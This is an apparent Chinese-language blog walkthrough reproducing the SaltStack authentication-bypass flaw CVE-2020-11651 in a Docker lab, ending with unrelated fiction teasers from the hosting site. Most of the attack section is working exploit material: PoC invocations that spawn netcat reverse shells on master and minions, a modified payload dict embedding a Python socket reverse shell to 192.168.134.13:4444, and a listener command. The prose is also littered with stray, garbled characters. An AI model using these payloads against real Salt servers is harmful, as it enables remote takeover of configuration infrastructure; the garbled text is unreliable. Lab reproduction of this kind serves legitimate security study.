CVE-2020-11651 SaltStack水平權(quán)限繞過(guò)漏洞

本文僅用于安全技術(shù)交流學(xué)習(xí)

SaltStack 是基于 Python 開(kāi)發(fā)的一套C/S架構(gòu)配置管理工具。國(guó)外某安全團(tuán)隊(duì)披露了 SaltStack 存在認(rèn)證繞過(guò)漏洞(CVE-2020-11651)和目錄遍歷漏洞(CVE-2020-11652)呵俏。

在 CVE-2020-11651 認(rèn)證繞過(guò)漏洞中堆缘,攻擊者通過(guò)構(gòu)造惡意請(qǐng)求,可以繞過(guò) Salt Master 的驗(yàn)證邏輯普碎,調(diào)用相關(guān)未授權(quán)函數(shù)功能吼肥,從而可以造成遠(yuǎn)程命令執(zhí)行漏洞。

參考鏈接:

漏洞環(huán)境

下載docker-compose.yml

執(zhí)行如下命令啟動(dòng)一個(gè)SaltStack Master服務(wù):

docker-compose up -d

環(huán)境啟動(dòng)后麻车,將會(huì)在本地監(jiān)聽(tīng)如下端口:

  • 4505/4506 這是SaltStack Master與minions通信的端口
  • 8000 這是Salt的API端口
  • 2222 這是容器內(nèi)部的SSH服務(wù)器監(jiān)聽(tīng)的端口

漏洞復(fù)現(xiàn)

首先獲取PoC代碼缀皱,需要python3的環(huán)境,先安裝依賴包pip install salt

舉例如下:

./cve-2020-11651.py 192.168.134.13 master 'nc 192.168.134.13 4444 -e "/bin/bash"'

./cve-2020-11651.py 192.168.134.13 minions 'nc 192.168.134.13 4444 -e "/bin/bash"'

./cve-2020-11651.py 192.168.134.13 fetchkeyonly

如果環(huán)境中沒(méi)有nc动猬,也可以修改PoC代碼啤斗,使用python直接構(gòu)造反彈shell。代碼中的payload由

msg = {"key":root_key,
            "cmd":"runner",
            'fun': 'salt.cmd',
            "kwarg":{
                "fun":"cmd.exec_code",
                "lang":"python3",
                "code":"import subprocess;subprocess.call('{}',shell=True)".format(command)
                },
            'jid': '20200504042611133934',
            'user': 'sudo_user',
            '_stamp': '2020-05-04T04:26:13.609688'}

改為:

msg = {"key":root_key,
            "cmd":"runner",
            'fun': 'salt.cmd',
            "kwarg":{
                "fun":"cmd.exec_code",
                "lang":"python3",
                "code":"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.134.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);"
                },
            'jid': '20200504042611133934',
            'user': 'sudo_user',
            '_stamp': '2020-05-04T04:26:13.609688'}

控制端開(kāi)啟nc接受反彈shell

nc -lvnp 4444
image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末赁咙,一起剝皮案震驚了整個(gè)濱河市钮莲,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌彼水,老刑警劉巖崔拥,帶你破解...
    沈念sama閱讀 216,744評(píng)論 6 502
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異凤覆,居然都是意外死亡波材,警方通過(guò)查閱死者的電腦和手機(jī)铺浇,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,505評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門杯道,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)列疗,“玉大人,你說(shuō)我怎么就攤上這事俺附》士ǎ” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,105評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵事镣,是天一觀的道長(zhǎng)步鉴。 經(jīng)常有香客問(wèn)我,道長(zhǎng)璃哟,這世上最難降的妖魔是什么氛琢? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,242評(píng)論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮随闪,結(jié)果婚禮上阳似,老公的妹妹穿的比我還像新娘。我一直安慰自己铐伴,他們只是感情好撮奏,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,269評(píng)論 6 389
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著当宴,像睡著了一般畜吊。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上户矢,一...
    開(kāi)封第一講書(shū)人閱讀 51,215評(píng)論 1 299
  • 那天玲献,我揣著相機(jī)與錄音,去河邊找鬼梯浪。 笑死捌年,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的驱证。 我是一名探鬼主播延窜,決...
    沈念sama閱讀 40,096評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼抹锄!你這毒婦竟也來(lái)了逆瑞?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 38,939評(píng)論 0 274
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤伙单,失蹤者是張志新(化名)和其女友劉穎获高,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體吻育,經(jīng)...
    沈念sama閱讀 45,354評(píng)論 1 311
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡念秧,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,573評(píng)論 2 333
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了布疼。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片摊趾。...
    茶點(diǎn)故事閱讀 39,745評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡币狠,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出砾层,到底是詐尸還是另有隱情漩绵,我是刑警寧澤,帶...
    沈念sama閱讀 35,448評(píng)論 5 344
  • 正文 年R本政府宣布肛炮,位于F島的核電站止吐,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏侨糟。R本人自食惡果不足惜碍扔,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,048評(píng)論 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望秕重。 院中可真熱鬧不同,春花似錦、人聲如沸悲幅。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,683評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)汰具。三九已至卓鹿,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間留荔,已是汗流浹背吟孙。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,838評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留聚蝶,地道東北人杰妓。 一個(gè)月前我還...
    沈念sama閱讀 47,776評(píng)論 2 369
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像碘勉,于是被迫代替她去往敵國(guó)和親巷挥。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,652評(píng)論 2 354